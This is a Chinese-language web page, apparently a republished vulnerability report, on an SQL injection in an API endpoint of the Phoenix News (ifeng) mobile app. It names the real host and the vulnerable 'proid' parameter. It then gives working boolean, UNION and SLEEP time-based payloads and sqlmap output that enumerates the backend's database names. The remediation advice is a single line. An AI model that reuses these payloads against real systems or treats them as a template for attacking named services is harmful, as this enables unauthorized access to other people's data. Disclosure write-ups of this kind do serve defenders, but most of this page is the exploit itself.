最新文章专题视频专题问答1问答10问答100问答1000问答2000关键字专题1关键字专题50关键字专题500关键字专题1500TAG最新视频文章推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37视频文章20视频文章30视频文章40视频文章50视频文章60 视频文章70视频文章80视频文章90视频文章100视频文章120视频文章140 视频2关键字专题关键字专题tag2tag3文章专题文章专题2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章专题3
当前位置: 首页 - 科技 - 知识百科 - 正文

凤凰网某应用sql注入漏洞_MySQL

来源:动视网 责编:小采 时间:2020-11-09 20:03:27
文档

凤凰网某应用sql注入漏洞_MySQL

凤凰网某应用sql注入漏洞_MySQL:凤凰网某应用sql注入漏洞凤凰新闻手机app的一个api接口过滤不严,存在注入漏洞。注入点:http://api.iapps.ifeng.com/news/upgrade.jsongv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&
推荐度:
导读凤凰网某应用sql注入漏洞_MySQL:凤凰网某应用sql注入漏洞凤凰新闻手机app的一个api接口过滤不严,存在注入漏洞。注入点:http://api.iapps.ifeng.com/news/upgrade.jsongv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&


凤凰网某应用sql注入漏洞

凤凰新闻手机app的一个api接口过滤不严,存在注入漏洞。

注入点:http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&zip=1,受影响参数:proid

证明:

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '12'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回正常数据

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '22'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回数据异常

sqlmap无压力,貌似凤凰汽车频道的库也在其中,

sqlmap identified the following injection points with a total of 50 HTTP(s) requests:

---

Place: GET

Parameter: proid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: gv=4.2.0&proid=ifengnews' AND 8025=8025 AND 'lqID'='lqID&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: UNION query

Title: MySQL UNION query (NULL) - 14 columns

Payload: gv=4.2.0&proid=-6406' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7166717471,0x457a716d67506d734978,0x716d696471),NULL,NULL,NULL,NULL,NULL#&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: gv=4.2.0&proid=ifengnews' AND SLEEP(5) AND 'tWlX'='tWlX&os=android_19&screen=720x1206&publishid=2011&zip=1

---

[09:36:11] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

[09:36:11] [INFO] fetching database names

[09:36:11] [INFO] the SQL query used returns 5 entries

[09:36:11] [INFO] retrieved: "information_schema"

[09:36:11] [INFO] retrieved: "auto_ifeng"

[09:36:11] [INFO] retrieved: "auto_ifeng_2"

[09:36:11] [INFO] retrieved: "mobile_ifeng"

[09:36:12] [INFO] retrieved: "test"

available databases [5]:

[*] auto_ifeng

[*] auto_ifeng_2

[*] information_schema

[*] mobile_ifeng

[*] test

修复方案:

过滤,参数化

文档

凤凰网某应用sql注入漏洞_MySQL

凤凰网某应用sql注入漏洞_MySQL:凤凰网某应用sql注入漏洞凤凰新闻手机app的一个api接口过滤不严,存在注入漏洞。注入点:http://api.iapps.ifeng.com/news/upgrade.jsongv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&
推荐度:
标签: 漏洞 mysql 凤凰网
  • 热门焦点

最新推荐

猜你喜欢

热门推荐

专题
Top